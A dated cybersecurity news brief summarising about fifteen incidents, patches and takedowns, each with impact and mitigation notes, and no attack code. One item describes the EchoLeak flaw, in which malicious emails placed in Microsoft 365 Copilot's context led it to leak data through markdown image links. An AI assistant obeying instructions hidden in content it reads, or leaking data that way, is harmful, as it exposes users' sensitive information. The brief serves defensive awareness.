Svoboda Cybersecurity Brief June 12, 2025

Jun 12, 2025

Stealth Falcon Exploits WebDAV Zero-Day in Targeted Attacks

The APT group Stealth Falcon exploited CVE-2025-33053, a WebDAV zero-day vulnerability, to execute remote code via crafted .url files. Attacks targeted defense and government entities in Turkey, Qatar, Egypt, and Yemen, deploying the Horus Agent malware for espionage. Microsoft patched the flaw in June 2025’s Patch Tuesday.
Impact: Enables SYSTEM-level control through WebDAV abuse.
Mitigation: Apply Microsoft’s patch immediately; block suspicious WebDAV traffic.
Source: BleepingComputer

INTERPOL Disrupts 20,000 Malicious IPs in Operation Secure

A global law enforcement operation dismantled 20,000 malicious IPs linked to 69 infostealer variants like Lumma and RisePro. Authorities seized 41 servers, arrested 32 suspects, and notified 216,000 victims. The operation spanned 26 countries, targeting credential theft fueling ransomware and BEC attacks.
Source: The Hacker News

Erie Insurance Confirms Cyberattack Disrupting Services

Erie Insurance suffered a cyberattack on June 7, 2025, causing widespread outages to customer portals and claims processing. The company activated incident response protocols but has not confirmed ransomware or data theft.
Impact: Business operations halted for days; customer data may be at risk.
Mitigation: Monitor for phishing attempts; avoid sharing credentials during outages.
Source: BleepingComputer

Microsoft Patches 67 Flaws Including Active WebDAV Zero-Day

June 2025 Patch Tuesday addressed 67 vulnerabilities, including the exploited CVE-2025-33053 (WebDAV RCE) and CVE-2025-33073 (SMB privilege escalation). The SMB flaw has public PoCs, raising exploitation risks.
Impact: Unpatched systems vulnerable to remote takeover.
Mitigation: Prioritize patches for WebDAV, SMB, and CLFS driver flaws.
Source: KrebsOnSecurity

Dutch Police Identify 126 Cracked.io Users in Cybercrime Crackdown

Dutch authorities identified 126 users of the hacking forum Cracked.io, with ages ranging from 11 to 20 years. Eight face criminal charges, while others received warnings. The operation highlighted risks of minor involvement in cybercrime.
Source: DataBreaches.net

Apache Tomcat Brute-Force Attacks Target Exposed Panels

Over 400 unique IPs launched coordinated brute-force attacks against Apache Tomcat Manager interfaces, primarily via DigitalOcean infrastructure. No specific vulnerability was abused, but weak credentials pose risks.
Impact: Unauthorized access to web app management interfaces.
Mitigation: Enforce strong authentication; restrict remote access to Tomcat Manager.
Source: BleepingComputer

Zero-Click AI Data Leak Flaw in Microsoft 365 Copilot

The EchoLeak vulnerability (CVE-2025-32711) allowed silent exfiltration of sensitive data via malicious emails in Copilot’s context. Microsoft patched it server-side in May 2025.
Impact: Unintended LLM data leaks via markdown image exfiltration.
Mitigation: Enable prompt injection filters; restrict external link rendering.
Source: BleepingComputer

40,000 Security Cameras Exposed via HTTP/RTSP

Bitsight found 40,000+ cameras globally leaking live feeds due to default credentials or misconfigurations. Most were in the US (14,000) and Japan (7,000), with telecoms (79%) and tech (6%) sectors most affected.
Impact: Privacy violations, espionage, and network pivoting.
Mitigation: Change defaults; disable remote access if unused.
Source: SecurityWeek

Former Black Basta Members Shift to Teams Phishing and Python Scripts

Ex-Black Basta actors now use Microsoft Teams phishing and Python scripts (e.g., cURL-based payload retrievals) for initial access. Attacks impersonate help desks, targeting finance and construction sectors.
Source: The Hacker News

SinoTrack GPS Devices Vulnerable to Remote Vehicle Control

CVE-2025-5484/CVE-2025-5485 in SinoTrack GPS devices allow unauthorized access via default credentials and predictable usernames. Exploits enable fuel pump shutdowns and location tracking.
Impact: Vehicle operations compromised.
Mitigation: Change passwords; obscure device identifiers.
Source: The Hacker News

RCMP Loses Unencrypted USB with Informant Data to Criminals

A lost RCMP USB drive containing 1,741 individuals’ data (witnesses, officers, informants) was sold on criminal markets. The breach occurred in 2022 but was disclosed in 2025.
Impact: High-risk exposure of sensitive law enforcement data.
Mitigation: Encrypt portable storage; enforce data handling policies.
Source: DataBreaches.net

DanaBot’s C&C Servers Leaked Data for 3 Years Before Takedown

The DanaBleed flaw in DanaBot’s C&C servers exposed attacker IPs, victim credentials, and backend details from 2022–2025. Law enforcement disrupted the botnet in May 2025.
Source: SecurityWeek

UEFI Secure Boot Bypass via DTResearch Apps (CVE-2025-3052)

A flaw in DTResearch’s UEFI apps (signed by Microsoft) allows Secure Boot bypass via NVRAM variable manipulation. Microsoft added hashes to its DBX blocklist.
Impact: Pre-OS malware persistence.
Mitigation: Apply DBX updates; monitor firmware integrity.
Source: SecurityWeek

Fortinet and Ivanti Patch High-Severity Flaws

Fortinet fixed CVE-2025-31104 (command injection in FortiADC) and Ivanti addressed hardcoded keys in Workspace Control (CVE-2025-5353). No exploits reported.
Source: SecurityWeek

Cyera Raises $540M for AI Data Security Platform

Cyera’s $540M Series E funding (total $1.3B) will expand its AI-driven data classification and security tools, focusing on generative AI risks.
Source: SecurityWeek

Share this brief: https://svo.bz/uhcl

If you want to support us, you can donate here: Donate